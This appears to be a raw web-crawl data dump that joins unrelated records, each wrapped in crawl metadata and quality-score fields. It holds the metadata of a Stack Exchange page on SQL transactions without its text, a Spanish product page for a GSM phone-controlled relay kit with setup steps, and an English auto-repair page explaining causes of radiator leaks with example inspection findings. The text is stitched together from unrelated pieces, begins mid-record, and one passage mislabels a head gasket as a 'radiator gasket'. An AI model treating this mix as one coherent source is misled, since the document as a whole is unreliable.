"WARC-Payload-Digest": "sha1:FQR2A2KL3NBLWI6HODFJHR5YK2XQZTYX",
"WARC-Record-ID": "<urn:uuid:fcf5294d-2313-4911-9cd8-b1af52a84144>",
"WARC-Target-URI": "http://programmers.stackexchange.com/questions/196141/not-using-sql-transactions",
"WARC-Truncated": null,
"WARC-Type": "response",
"WARC-Warcinfo-ID": "<urn:uuid:7a3b00ff-33be-4c3c-a556-9c21b083e5b6>"
},
"warc_info": "robots: classic\r\nhostname: ip-10-71-132-137.ec2.internal\r\nsoftware: Nutch 1.6 (CC)/CC WarcExport 1.0\r\nisPartOf: CC-MAIN-2015-48\r\noperator: CommonCrawl Admin\r\ndescription: Wide crawl of the web for Nov 2015\r\npublisher: CommonCrawl\r\nformat: WARC File Format 1.0\r\nconformsTo: http://bibnum.bnf.fr/WARC/WARC_ISO_28500_version1_latestdraft.pdf"
}
|
{
"line_start_idx": [
0,
10,
175,
176,
319,
320,
626,
627,
655,
659,
819,
824,
1060,
1065,
1212,
1216,
1522,
1527,
1630,
1631,
1643,
1644,
1858,
1859,
1974,
2174,
2540,
2693,
2694,
2758,
2759,
2785,
2790,
2916,
2920,
3519,
3520,
3681,
3682,
3872,
3873,
4418,
4419,
4445,
4450,
4756,
4761,
5089,
5094,
5264,
5269,
5372,
5377,
5489,
5490,
5502,
5503,
5505,
5513,
5514,
5592,
5593
],
"line_end_idx": [
10,
175,
176,
319,
320,
626,
627,
655,
659,
819,
824,
1060,
1065,
1212,
1216,
1522,
1527,
1630,
1631,
1643,
1644,
1858,
1859,
1974,
2174,
2540,
2693,
2694,
2758,
2759,
2785,
2790,
2916,
2920,
3519,
3520,
3681,
3682,
3872,
3873,
4418,
4419,
4445,
4450,
4756,
4761,
5089,
5094,
5264,
5269,
5372,
5377,
5489,
5490,
5502,
5503,
5505,
5513,
5514,
5592,
5593,
5683
]
}
|
{
"red_pajama_v2": {
"ccnet_original_length": 5683,
"ccnet_original_nlines": 61,
"rps_doc_curly_bracket": 0,
"rps_doc_ldnoobw_words": 0,
"rps_doc_lorem_ipsum": 0,
"rps_doc_stop_word_fraction": 0.4070872962474823,
"rps_doc_ut1_blacklist": 0,
"rps_doc_frac_all_caps_words": 0.025064820423722267,
"rps_doc_frac_lines_end_with_ellipsis": 0,
"rps_doc_frac_no_alph_words": 0.20138289034366608,
"rps_doc_frac_unique_words": 0.40732982754707336,
"rps_doc_mean_word_length": 4.6921467781066895,
"rps_doc_num_sentences": 67,
"rps_doc_symbol_to_word_ratio": 0,
"rps_doc_unigram_entropy": 5.417199611663818,
"rps_doc_word_count": 955,
"rps_doc_frac_chars_dupe_10grams": 0,
"rps_doc_frac_chars_dupe_5grams": 0.08926579356193542,
"rps_doc_frac_chars_dupe_6grams": 0.0803392082452774,
"rps_doc_frac_chars_dupe_7grams": 0.05222048982977867,
"rps_doc_frac_chars_dupe_8grams": 0,
"rps_doc_frac_chars_dupe_9grams": 0,
"rps_doc_frac_chars_top_2gram": 0.01071188971400261,
"rps_doc_frac_chars_top_3gram": 0.021870119497179985,
"rps_doc_frac_chars_top_4gram": 0.014059360139071941,
"rps_doc_books_importance": -505.7127380371094,
"rps_doc_books_importance_length_correction": -505.7127380371094,
"rps_doc_openwebtext_importance": -256.70550537109375,
"rps_doc_openwebtext_importance_length_correction": -256.70550537109375,
"rps_doc_wikipedia_importance": -202.00413513183594,
"rps_doc_wikipedia_importance_length_correction": -202.00413513183594
},
"fasttext": {
"dclm": 0.3688145875930786,
"english": 0.9330920577049255,
"fineweb_edu_approx": 1.8336955308914185,
"eai_general_math": 0.07820391654968262,
"eai_open_web_math": 0.2792918086051941,
"eai_web_code": 0.0013889699475839734
}
}
|
{
"free_decimal_correspondence": {
"primary": {
"code": "005.74",
"labels": {
"level_1": "General works, books and libraries, information sciences",
"level_2": "",
"level_3": "Computer programming"
}
},
"secondary": {
"code": "005.1",
"labels": {
"level_1": "General works, books and libraries, information sciences",
"level_2": "",
"level_3": "Computer programming"
}
}
},
"bloom_cognitive_process": {
"primary": {
"code": "4",
"label": "Analyze"
},
"secondary": {
"code": "5",
"label": "Evaluate"
}
},
"bloom_knowledge_domain": {
"primary": {
"code": "2",
"label": "Conceptual"
},
"secondary": {
"code": "3",
"label": "Procedural"
}
},
"document_type_v1": {
"primary": {
"code": "5",
"label": "Social/Forum"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"extraction_artifacts": {
"primary": {
"code": "3",
"label": "Irrelevant Content"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"missing_content": {
"primary": {
"code": "0",
"label": "No missing content"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"document_type_v2": {
"primary": {
"code": "18",
"label": "Q&A Forum"
},
"secondary": {
"code": "8",
"label": "Documentation"
}
},
"reasoning_depth": {
"primary": {
"code": "3",
"label": "Intermediate Reasoning"
},
"secondary": {
"code": "2",
"label": "Basic Reasoning"
}
},
"technical_correctness": {
"primary": {
"code": "4",
"label": "Highly Correct"
},
"secondary": {
"code": "3",
"label": "Mostly Correct"
}
},
"education_level": {
"primary": {
"code": "3",
"label": "Undergraduate Level"
},
"secondary": {
"code": "2",
"label": "High School Level"
}
}
}
|
71f077df794da2774531b20248bb19b0
|
-7,897,255,614,267,716,000
|
CONTROL REMOTO VIA GSM CELULAR 1 canal
Con este dispositivo se controlan lamparas, aparatos eléctricos, ventiladores etc. VIA GSM
Control-gsm
CARACTERISTICAS
El programa Controldtmf se corre en la pc que va a funcionar como servidor
No es necesario instalar solo descomprimir la carpeta,
EL servidor, usa una versión mini de apache ( MAPACHE.exe ) tutoServidor
Después abrimos el programa Controldtmf este programa funciona perfectamente como local o por medio de Internet
Ahora tenemos que configurar el DNS para podernos dirigir desde cualquier lugar en el mundo a nuesta PC tutoDNS
También podemos monitotear la actividad con el programa monitor incluido tutoMonitor
monitoreado-con-webcam
Se puede CONECTAR A PC o laptop para Monitorear y controlar desde Internet
Solo se conecta a la pc a la salida de audífonos
FUNCIONAMIENTO
Se llama al teléfono conectado al sistema,
El telefono contesta ( esta es modo autocontestar )
Se inserta un código y se activa o se desactiva el dispositivo
Ejemplo:
Para activar el aparato presionamos el 0 desde el teléfono remoto
esperamos un tono de confirmación y posteriormente presionamos #
Para desactivar el modulo presionamos 0 y posteriormente *(asterisco)
AL ACTIVAR EL DISPOSITIVO escuchamos un tono que indica que la orden fue efectuada.
Marcamos al telefono remoto
paso-cero
ESTE contesta ( esta en modo autocontestar )
paso-cero-dos
Tecleamos 0 y esperamos la confirmación de recibido, que es un tono
Tecleamos # que es la función de encendido ( * es la función de apagado )
Y activamos el aparato paso-dos Y por ultimo colgamos
paso-tres
CONTENIDO DEL KIT
1 MODULO DE CONTROL
1 MODULO RELEVADOR
1 ELIMINADOR
1 conector macho 3.5 mm para la mayoría de los celulares
NO INCLUYE TELEFONO CELULAR
mini-apache El TXinfraPROnet demo controlGSMnet1canal
Compatible con el el programa controldtmf ( solo podemos controlar 1 aparato ) control-dtmf Registro demoactividad
El programa Controldtmf se corre en la pc que va a funcionar como servidor
No es necesario instalar solo descomprimir la carpeta,
EL servidor, usa una versión mini de apache ( MAPACHE.exe ) tutoServidor
Después abrimos el programa Controldtmf este programa funciona perfectamente como local o por medio de Internet
Ahora tenemos que configurar el DNS para podernos dirigir desde cualquier lugar en el mundo a nuesta PC tutoDNS
También podemos monitotear la actividad con el programa monitor incluido tutoMonitor
monitor-uno
|
{
"url": "http://casainteligente.infrarrojos.net/Control-remoto-GSM-GPRS-celular-1-canal.html",
"source_domain": "casainteligente.infrarrojos.net",
"snapshot_id": "crawl=CC-MAIN-2018-17",
"warc_metadata": {
"Content-Length": "5970",
"Content-Type": "application/http; msgtype=response",
"WARC-Block-Digest": "sha1:6DNL6CMBOLGBNHGJUE6LMWMGKMOAJ3JH",
"WARC-Concurrent-To": "<urn:uuid:3285e893-586a-4aa2-bf4b-056318cbf2ae>",
"WARC-Date": "2018-04-22T22:00:38Z",
"WARC-IP-Address": "204.93.161.234",
"WARC-Identified-Payload-Type": "text/html",
"WARC-Payload-Digest": "sha1:2KXG46FCVOCE4NJY3WDD3E6TZXGJECSS",
"WARC-Record-ID": "<urn:uuid:beab75e4-828d-4376-bc9c-b707a314327e>",
"WARC-Target-URI": "http://casainteligente.infrarrojos.net/Control-remoto-GSM-GPRS-celular-1-canal.html",
"WARC-Truncated": null,
"WARC-Type": "response",
"WARC-Warcinfo-ID": "<urn:uuid:dd9e4148-efb9-4c1a-bfb9-aaf6c0671a7e>"
},
"warc_info": "robots: classic\r\nhostname: ip-10-141-50-105.ec2.internal\r\nsoftware: Nutch 1.6 (CC)\r\nisPartOf: CC-MAIN-2018-17\r\noperator: Common Crawl Admin\r\ndescription: Wide crawl of the web for April 2018\r\npublisher: Common Crawl\r\nformat: WARC File Format 1.0\r\nconformsTo: http://bibnum.bnf.fr/WARC/WARC_ISO_28500_version1_latestdraft.pdf"
}
|
{
"line_start_idx": [
0,
39,
40,
131,
132,
144,
160,
161,
236,
291,
364,
476,
588,
673,
674,
697,
698,
773,
774,
823,
824,
839,
840,
883,
935,
998,
1007,
1073,
1138,
1208,
1292,
1320,
1321,
1331,
1332,
1377,
1378,
1392,
1393,
1461,
1535,
1589,
1590,
1600,
1618,
1619,
1639,
1658,
1671,
1728,
1756,
1810,
1925,
1926,
2001,
2056,
2129,
2241,
2353,
2438
],
"line_end_idx": [
39,
40,
131,
132,
144,
160,
161,
236,
291,
364,
476,
588,
673,
674,
697,
698,
773,
774,
823,
824,
839,
840,
883,
935,
998,
1007,
1073,
1138,
1208,
1292,
1320,
1321,
1331,
1332,
1377,
1378,
1392,
1393,
1461,
1535,
1589,
1590,
1600,
1618,
1619,
1639,
1658,
1671,
1728,
1756,
1810,
1925,
1926,
2001,
2056,
2129,
2241,
2353,
2438,
2449
]
}
|
{
"red_pajama_v2": {
"ccnet_original_length": 2449,
"ccnet_original_nlines": 59,
"rps_doc_curly_bracket": 0,
"rps_doc_ldnoobw_words": 0,
"rps_doc_lorem_ipsum": 0,
"rps_doc_stop_word_fraction": 0.06650830805301666,
"rps_doc_ut1_blacklist": 0,
"rps_doc_frac_all_caps_words": 0.0950118824839592,
"rps_doc_frac_lines_end_with_ellipsis": 0,
"rps_doc_frac_no_alph_words": 0.12589074671268463,
"rps_doc_frac_unique_words": 0.4191780686378479,
"rps_doc_mean_word_length": 5.556164264678955,
"rps_doc_num_sentences": 6,
"rps_doc_symbol_to_word_ratio": 0.004750589840114117,
"rps_doc_unigram_entropy": 4.694428443908691,
"rps_doc_word_count": 365,
"rps_doc_frac_chars_dupe_10grams": 0.424063116312027,
"rps_doc_frac_chars_dupe_5grams": 0.424063116312027,
"rps_doc_frac_chars_dupe_6grams": 0.424063116312027,
"rps_doc_frac_chars_dupe_7grams": 0.424063116312027,
"rps_doc_frac_chars_dupe_8grams": 0.424063116312027,
"rps_doc_frac_chars_dupe_9grams": 0.424063116312027,
"rps_doc_frac_chars_top_2gram": 0.034516770392656326,
"rps_doc_frac_chars_top_3gram": 0.05177515000104904,
"rps_doc_frac_chars_top_4gram": 0.022682450711727142,
"rps_doc_books_importance": -150.1238555908203,
"rps_doc_books_importance_length_correction": -150.1238555908203,
"rps_doc_openwebtext_importance": -99.6675796508789,
"rps_doc_openwebtext_importance_length_correction": -99.6675796508789,
"rps_doc_wikipedia_importance": -84.84046173095703,
"rps_doc_wikipedia_importance_length_correction": -84.84046173095703
},
"fasttext": {
"dclm": 0.6366374492645264,
"english": 0.004157249815762043,
"fineweb_edu_approx": 1.3357510566711426,
"eai_general_math": 0.0002759099879767746,
"eai_open_web_math": 0.5309389233589172,
"eai_web_code": 0.550286591053009
}
}
|
{
"free_decimal_correspondence": {
"primary": {
"code": "621.384",
"labels": {
"level_1": "Industrial arts, Technology, and Engineering",
"level_2": "Engineering",
"level_3": "Mechanical engineering and Machinery"
}
},
"secondary": {
"code": "004.6",
"labels": {
"level_1": "General works, books and libraries, information sciences",
"level_2": "",
"level_3": "Computers and Computer science"
}
}
},
"bloom_cognitive_process": {
"primary": {
"code": "3",
"label": "Apply"
},
"secondary": {
"code": "2",
"label": "Understand"
}
},
"bloom_knowledge_domain": {
"primary": {
"code": "3",
"label": "Procedural"
},
"secondary": {
"code": "2",
"label": "Conceptual"
}
},
"document_type_v1": {
"primary": {
"code": "3",
"label": "Reference/Encyclopedic/Educational"
},
"secondary": {
"code": "4",
"label": "Code/Software"
}
},
"extraction_artifacts": {
"primary": {
"code": "0",
"label": "No Artifacts"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"missing_content": {
"primary": {
"code": "0",
"label": "No missing content"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"document_type_v2": {
"primary": {
"code": "23",
"label": "Tutorial"
},
"secondary": {
"code": "8",
"label": "Documentation"
}
},
"reasoning_depth": {
"primary": {
"code": "2",
"label": "Basic Reasoning"
},
"secondary": {
"code": "1",
"label": "No Reasoning"
}
},
"technical_correctness": {
"primary": {
"code": "4",
"label": "Highly Correct"
},
"secondary": {
"code": "3",
"label": "Mostly Correct"
}
},
"education_level": {
"primary": {
"code": "2",
"label": "High School Level"
},
"secondary": {
"code": "1",
"label": "General Audience"
}
}
}
|
71f077df794da2774531b20248bb19b0
|
6,194,999,230,493,757,000
|
Autotechiq
issues
Navigation
Hey, Why Is My Radiator Leaking?
If you are short on time and want to fast-track the process to professional help, click Yes
Four common causes for a vehicle Radiator Leaking and their related parts.
The radiator is a component of the engine's cooling system. It is located in the front of the vehicle and uses airflow across the radiator core to transfer the heat developed during engine combustion to the outside air. The system is under pressure to allow the system to operate at higher temperatures to help with complete combustion and minimize vehicle emissions.
Have You Noticed a Leak In Your Vehicle's Radiator?
A radiator leak is commonly caused by a loose/broken radiator cap, damage in the radiator hose, internal chemical electrolysis, or a crack in the tank due to impact or wear. Also, note that a coolant reservoir leak can be commonly mistaken for a radiator leak.
This can result in overheating, engine damage, and unreliable performance. So, it's crucial not to overlook the bad signs and take prompt action. For example, if you notice coolant puddles or a decrease in your vehicle's coolant level, it indicates that the radiator fluid is seeping out. Ignoring these warnings can lead to costly repairs and inconvenience down the road.
Remember, promptly addressing a leaking radiator is an investment in your vehicle's longevity and peace of mind.
Let's Get To The Bottom Of It!
• Q: Do you see a red, yellow, or green crust around the radiator hose ends?
The radiator hoses are like flexible tubes made of rubber. They connect to the radiator and the engine block through firm hose adapters. They carry the coolant from the engine to the radiator and back again. Over time, the rubber hoses can become stiff and fragile because they're made of rubber. Additionally, when the coolant becomes acidic, it gradually weakens the hoses from the inside. If you notice a coolant leak, it may be because the hoses start leaking at the connections between the fittings and the hose itself. You might see a dried, crusty material of a specific color, meaning that the coolant has been leaking.
• Q: Is the engine oil texture resembling a milkshake?
The head gasket is like a seal that connects the engine's head to its block. Its main job is to keep the coolant passages separate from the oil passages and the combustion chamber. However, the coolant can become acidic if the engine gets too hot or the cooling system wears out. This acidity and electrolysis can damage the head gasket and create leaks. As a result, the coolant can enter the cylinder and pass through the piston rings, eventually ending up in the crankcase where the engine oil is stored; this results in a mix of coolant and oil. When this happens, the engine oil looks milky, resembling a dark milkshake.
• Q: Are there pinhole leaks in the radiator?
The coolant must have a certain alkalinity level to stay healthy. However, as time goes by and the coolant gets used, it becomes more acidic. This acidity allows the coolant to conduct electricity. This creates a process called electrolysis, which can damage plastic and aluminum parts in the engine. As a result, these components start to wear out, and small holes, called pinhole leaks, can form.
• Q: Do you notice coolant puddles under your vehicle?
The radiator comprises two tanks on each end of the core. Its purpose is to allow coolant to flow from one tank through the core, into the other tank, and back to the engine. The radiator's core is typically made of aluminum or copper, while the tanks are made of plastic. A rubber seal between the core and the tanks is in place to keep them connected. However, as time passes and the radiator is used, this seal can become weak and brittle, eventually cracking. When this happens, it can lead to a leak underneath the vehicle.
Find Professional Help
Please select your vehicle's brand and location so we can locate the best professional help for you
If you are a shop owner and sick of business directories that are based on the cost of repair, AutoTechIQ is for you. If your customers receive Digital Inspection results then AutoTechIQ is definitely for you. Check out the certification page or how to rank in your area.
Vehicle Health Inspection Proof
Explore the following typical inspection results that show a potential cause for the symptom and select the one you believe is similar to your vehicle's issue.
The coolant reservoir is leaking and causing the low coolant warning light to appear on the dashboard, resulting in engine overheating
The proof image shows the coolant reservoir leaking at the seam, which explains the low coolant level. Therefore, the coolant reservoir must be replaced with a new one to fix the issue.
When the customer brought in their vehicle, they were concerned about the low coolant light popping on the dashboard every morning. The light would turn off after driving for a while, but now it's consistent. The customer also mentioned they hadn't noticed any coolant puddle on the ground.
During a test drive, the technician confirmed that the low coolant light was on. As part of a vehicle health inspection, the technician discovered that the coolant level was low, and there was evidence of coolant underneath the coolant reservoir.
To further investigate, the technician used a coolant pressure system tester. After filling the coolant correctly, they pressurized the system to 12 psi. Unfortunately, the coolant reservoir was leaking at the seams during this test. This leakage was the cause of the low coolant level, and the reservoir will need to be replaced.
Does the issue look like this? if not accessible your shop will document it
The coolant is overflowing the reservoir because the radiator cap is not holding the specified psi to keep coolant healthy
The proof image shows the radiator cap being tested and failing to hold pressure. This explains why the coolant is boiling over and causing the overflow tank to overflow. The technician will replace the faulty radiator cap with a new one to resolve the issue.
When the customer brought in their vehicle, they were worried because the overflow tank in the cooling system was boiling over, even though the engine didn't seem to overheat. They mentioned that they had been adding coolant every morning to keep up with it.
During a test drive, the technician confirmed the coolant overflowing in the overflow reservoir. However, during the initial vehicle health inspection, the technician found no issues related to the customer's concern.
To investigate further, the technician checked the acidity level of the coolant, and it was within the acceptable range. They then used a cooling system pressure checker to look for leaks but found none.
Next, the technician examined the radiator cap and discovered it held less pressure. The radiator cap is supposed to hold up to 12 pounds per square inch (psi), but it was failing and only holding less than 4 psi. Therefore, the radiator cap needs to be replaced.
Does the issue look like this? if not accessible your shop will document it
The radiator is leaking coolant, causing fluid loss, resulting in engine overheating.
The proof image shows the radiator leaking, explaining why a coolant puddle is under the vehicle. This confirms the need for a radiator replacement to resolve the issue.
When the customer dropped off their vehicle, they mentioned noticing a red liquid puddle where they usually park.
During a test drive, the technician encountered no issues related to the customer's concern. However, during a vehicle health inspection, the technician noticed the coolant level was low.
To investigate further, the technician used a cooling system pressure tester. They connected the tester to the same place where the radiator cap goes and increased the pressure to 12 pounds per square inch (PSI), which is the rating of the radiator cap.
The technician discovered the radiator was leaking between the tank and the core through the test. As a result, the radiator will need to be replaced.
Does the issue look like this? if not accessible your shop will document it
Testing the coolant on a tool. The result showsh that the coolant is acidic and needs to be exchanged
The proof image shows the voltage test, demonstrating the need for coolant replacement. In addition, it helps confirm the presence of electrolysis in the coolant. Finally, it supports the technician's recommendation to replace the corroded radiator and perform a cooling system flush to prevent further issues.
When the customer brought in their vehicle, they mentioned noticing coolant on the ground underneath it. They even saw a tiny leak in the radiator that looked like a small hole, as if someone had poked it with a needle.
During a test drive, the technician detected the smell of coolant after driving for a bit. Upon pulling the vehicle into the service bay, they saw coolant coming out of the radiator through a pinhole.
During a vehicle health inspection, the technician discovered the radiator leaking from a pinhole. They also noticed that the coolant level was low. To investigate further, the technician checked the pH level of the coolant. They found that it was highly imbalanced, going beyond the normal range.
In this case, chemical electrolysis might be causing damage from the inside of the radiator and creating the pinhole. So, the technician conducted a test using a digital voltmeter. They placed the positive probe of the voltmeter in the coolant and connected the other end to the negative battery cable.
The results showed a current of 400 millivolts in the coolant, confirming that electrolysis was the cause of the pinhole leak. Therefore, the radiator needs to be replaced. The mechanic used handy tools in this whole process; this is the type of service you should expect regardless if you're servicing a Japanese or American vehicle.
In addition to replacing the radiator, the technician recommends a cooling system flush. This is necessary due to the imbalanced pH level of the existing coolant. Flushing the system and using fresh coolant will significantly reduce the risk of electrolysis and causing future leaks.
Does the issue look like this? if not accessible your shop will document it
The dipstick shows a very brownish milkshake-like oil. This indicates the head gasket is leaking, allowing coolant to mix with engine oil
The proof image provided shows the milkshake-like appearance of the engine oil, indicating the faulty radiator gasket. This is a significant issue that requires further investigation and action to resolve.
When the customer brought in their vehicle, they mentioned it was difficult to start it. Additionally, they had been checking the engine oil and noticed that it looked like a milkshake in color.
During a test drive, the technician observed a puff of white smoke from the exhaust when starting the vehicle. They also noticed that the engine took longer to crank before starting.
The technician performed a vehicle health inspection and found the coolant level low. But unfortunately, they also discovered that the engine oil had coolant mixed into it, resulting in a chocolate milkshake-like appearance.
The technician used a block tester and special testing fluid to investigate the issue further. They replaced the radiator cap with the block tester and started the vehicle. Almost immediately, the testing fluid changed color from blue to yellow. This confirmed that the head gaskets had failed.
Based on these findings, the technician recommends a more extensive engine tear-down to verify the damage's extent. This will help determine whether the head gaskets and the engine can be repaired or if a complete replacement is necessary.
Does the issue look like this? if not accessible your shop will document it
A coolant leak can build up crustic material around the leaking area, like coolant hoses
The proof image provided shows the crusty build-up of dried coolant, confirming the need to replace the radiator hoses. The crusty material is a clear indication of coolant leakage. By replacing these hoses, the technician will address the issue and prevent further leaks in the cooling system.
When the customer brought in their vehicle, they noticed some pink crusty stuff around one of the hoses while checking the engine oil. They described it as similar to the crusty material that forms around battery cable ends, even though the hose is nowhere near the battery.
During a test drive, the technician didn't notice anything about the customer's concern. However, during a vehicle health inspection, the technician observed that the coolant level was low, and the radiator hose had a crusty build-up around the adapter where the feed hose connects from the de-gas bottle.
To investigate further, the technician used a cooling system pressure tester. They connected it to the de-gas bottle and increased the pressure to the maximum limit recommended by the manufacturer, 12 pounds per square inch (PSI).
Through this test, which is also common for DOT inspections, the technician confirmed that the coolant hose was leaking. As a result, they recommend replacing both the upper and lower radiator hoses, as well as both heater hoses.
Does the issue look like this? if not accessible your shop will document it
Typical Fixes to Address the Cause(s)
The following chapters bases themselves on experiences from our auto repair shop; we'll describe related problems' causes and fixes.
"Coolant Reservoir Replacement" fixes "Leaking coolant reservoir"
The AutoTechIQ ranking for Safety, Cost Avoidance, and Environmental Impact is
Safetyi
env level
env level
Cost Avoidancei
env level
env level
Environmental Impacti
env level
env level
Hey, Why Is My Radiator Leaking?
Sometimes a problem is more challenging to describe than it initially looked like. If you are not sure your problem is described by this article, please find below similar vehicle symptoms, which might describe better the issue you are experiencing.
Other things your auto repair shop might talk about:
Coolant leaking. Internal combustion engine. Losing coolant. leaky radiator valve. water pump.
|
{
"url": "https://www.autotechiq.com/symptom/hey-why-is-my-radiator-leaking",
"source_domain": "www.autotechiq.com",
"snapshot_id": "CC-MAIN-2024-22",
"warc_metadata": {
"Content-Length": "278336",
"Content-Type": "application/http; msgtype=response",
"WARC-Block-Digest": "sha1:5HBHSAJVWRUJNNAADTHHMWEOPRPZ7CCR",
"WARC-Concurrent-To": "<urn:uuid:3abcc43c-8d61-4638-ba45-86412dfb4817>",
"WARC-Date": "2024-05-30T03:33:08Z",
"WARC-IP-Address": "170.39.213.176",
"WARC-Identified-Payload-Type": "text/html",
"WARC-Payload-Digest": "sha1:BSYHDZPBRH2FP4KONCJFAZYUXNMXR6IK",
"WARC-Record-ID": "<urn:uuid:b4f763d7-f1d4-462f-8467-243100f43e95>",
"WARC-Target-URI": "https://www.autotechiq.com/symptom/hey-why-is-my-radiator-leaking",
"WARC-Truncated": null,
"WARC-Type": "response",
"WARC-Warcinfo-ID": "<urn:uuid:dfaabd54-f55b-47f5-a4f5-de8707c41ecb>"
},
"warc_info": "isPartOf: CC-MAIN-2024-22\r\npublisher: Common Crawl\r\ndescription: Wide crawl of the web for May 2024\r\noperator: Common Crawl Admin ([email protected])\r\nhostname: ip-10-67-67-29\r\nsoftware: Apache Nutch 1.19 (modified, https://github.com/commoncrawl/nutch/)\r\nrobots: checked via crawler-commons 1.5-SNAPSHOT (https://github.com/crawler-commons/crawler-commons)\r\nformat: WARC File Format 1.1\r\nconformsTo: https://iipc.github.io/warc-specifications/specifications/warc-format/warc-1.1/"
}
|
{
"line_start_idx": [
0,
11,
18,
29,
30,
63,
64,
156,
157,
232,
600,
601,
653,
654,
915,
916,
1289,
1290,
1403,
1404,
1435,
1436,
1515,
1516,
2148,
2149,
2206,
2207,
2837,
2838,
2886,
2887,
3290,
3291,
3348,
3349,
3882,
3883,
3906,
3907,
4007,
4279,
4280,
4312,
4313,
4473,
4474,
4609,
4610,
4796,
4797,
5088,
5089,
5336,
5337,
5668,
5669,
5745,
5868,
5869,
6129,
6130,
6389,
6390,
6608,
6609,
6813,
6814,
7078,
7079,
7155,
7241,
7242,
7412,
7413,
7527,
7528,
7716,
7717,
7971,
7972,
8123,
8124,
8200,
8302,
8303,
8614,
8615,
8835,
8836,
9037,
9038,
9336,
9337,
9640,
9641,
9976,
9977,
10261,
10262,
10338,
10476,
10477,
10683,
10684,
10879,
10880,
11063,
11064,
11289,
11290,
11585,
11586,
11826,
11827,
11903,
11992,
11993,
12288,
12289,
12564,
12565,
12871,
12872,
13103,
13104,
13334,
13335,
13411,
13412,
13450,
13451,
13584,
13585,
13651,
13652,
13731,
13732,
13740,
13750,
13760,
13776,
13786,
13796,
13818,
13828,
13838,
13871,
14121,
14122,
14175,
14176
],
"line_end_idx": [
11,
18,
29,
30,
63,
64,
156,
157,
232,
600,
601,
653,
654,
915,
916,
1289,
1290,
1403,
1404,
1435,
1436,
1515,
1516,
2148,
2149,
2206,
2207,
2837,
2838,
2886,
2887,
3290,
3291,
3348,
3349,
3882,
3883,
3906,
3907,
4007,
4279,
4280,
4312,
4313,
4473,
4474,
4609,
4610,
4796,
4797,
5088,
5089,
5336,
5337,
5668,
5669,
5745,
5868,
5869,
6129,
6130,
6389,
6390,
6608,
6609,
6813,
6814,
7078,
7079,
7155,
7241,
7242,
7412,
7413,
7527,
7528,
7716,
7717,
7971,
7972,
8123,
8124,
8200,
8302,
8303,
8614,
8615,
8835,
8836,
9037,
9038,
9336,
9337,
9640,
9641,
9976,
9977,
10261,
10262,
10338,
10476,
10477,
10683,
10684,
10879,
10880,
11063,
11064,
11289,
11290,
11585,
11586,
11826,
11827,
11903,
11992,
11993,
12288,
12289,
12564,
12565,
12871,
12872,
13103,
13104,
13334,
13335,
13411,
13412,
13450,
13451,
13584,
13585,
13651,
13652,
13731,
13732,
13740,
13750,
13760,
13776,
13786,
13796,
13818,
13828,
13838,
13871,
14121,
14122,
14175,
14176,
14271
]
}
|
{
"red_pajama_v2": {
"ccnet_original_length": 14271,
"ccnet_original_nlines": 151,
"rps_doc_curly_bracket": 0,
"rps_doc_ldnoobw_words": 0,
"rps_doc_lorem_ipsum": 0,
"rps_doc_stop_word_fraction": 0.4036526381969452,
"rps_doc_ut1_blacklist": 0,
"rps_doc_frac_all_caps_words": 0.0037271699402481318,
"rps_doc_frac_lines_end_with_ellipsis": 0,
"rps_doc_frac_no_alph_words": 0.11815132200717926,
"rps_doc_frac_unique_words": 0.2637644112110138,
"rps_doc_mean_word_length": 4.920187950134277,
"rps_doc_num_sentences": 141,
"rps_doc_symbol_to_word_ratio": 0,
"rps_doc_unigram_entropy": 5.344461441040039,
"rps_doc_word_count": 2343,
"rps_doc_frac_chars_dupe_10grams": 0.07807078212499619,
"rps_doc_frac_chars_dupe_5grams": 0.1910131871700287,
"rps_doc_frac_chars_dupe_6grams": 0.16099931299686432,
"rps_doc_frac_chars_dupe_7grams": 0.1359299123287201,
"rps_doc_frac_chars_dupe_8grams": 0.09854268282651901,
"rps_doc_frac_chars_dupe_9grams": 0.09507287293672562,
"rps_doc_frac_chars_top_2gram": 0.029580149799585342,
"rps_doc_frac_chars_top_3gram": 0.009715479798614979,
"rps_doc_frac_chars_top_4gram": 0.008327550254762173,
"rps_doc_books_importance": -1409.4752197265625,
"rps_doc_books_importance_length_correction": -1409.4752197265625,
"rps_doc_openwebtext_importance": -724.4542846679688,
"rps_doc_openwebtext_importance_length_correction": -724.4542846679688,
"rps_doc_wikipedia_importance": -545.3196411132812,
"rps_doc_wikipedia_importance_length_correction": -545.3196411132812
},
"fasttext": {
"dclm": 0.6124567985534668,
"english": 0.9573714137077332,
"fineweb_edu_approx": 2.5321640968322754,
"eai_general_math": 0.24027490615844727,
"eai_open_web_math": 0.2212437391281128,
"eai_web_code": 0.07626610994338989
}
}
|
{
"free_decimal_correspondence": {
"primary": {
"code": "629.222",
"labels": {
"level_1": "Industrial arts, Technology, and Engineering",
"level_2": "Engineering",
"level_3": ""
}
},
"secondary": {
"code": "629.22",
"labels": {
"level_1": "Industrial arts, Technology, and Engineering",
"level_2": "Engineering",
"level_3": ""
}
}
},
"bloom_cognitive_process": {
"primary": {
"code": "2",
"label": "Understand"
},
"secondary": {
"code": "3",
"label": "Apply"
}
},
"bloom_knowledge_domain": {
"primary": {
"code": "2",
"label": "Conceptual"
},
"secondary": {
"code": "3",
"label": "Procedural"
}
},
"document_type_v1": {
"primary": {
"code": "3",
"label": "Reference/Encyclopedic/Educational"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"extraction_artifacts": {
"primary": {
"code": "3",
"label": "Irrelevant Content"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"missing_content": {
"primary": {
"code": "4",
"label": "Missing Images or Figures"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"document_type_v2": {
"primary": {
"code": "23",
"label": "Tutorial"
},
"secondary": {
"code": "21",
"label": "Customer Support"
}
},
"reasoning_depth": {
"primary": {
"code": "3",
"label": "Intermediate Reasoning"
},
"secondary": {
"code": "2",
"label": "Basic Reasoning"
}
},
"technical_correctness": {
"primary": {
"code": "4",
"label": "Highly Correct"
},
"secondary": {
"code": "3",
"label": "Mostly Correct"
}
},
"education_level": {
"primary": {
"code": "2",
"label": "High School Level"
},
"secondary": {
"code": "1",
"label": "General Audience"
}
}
}
|
71f077df794da2774531b20248bb19b0
|
5,438,682,256,301,094,000
|
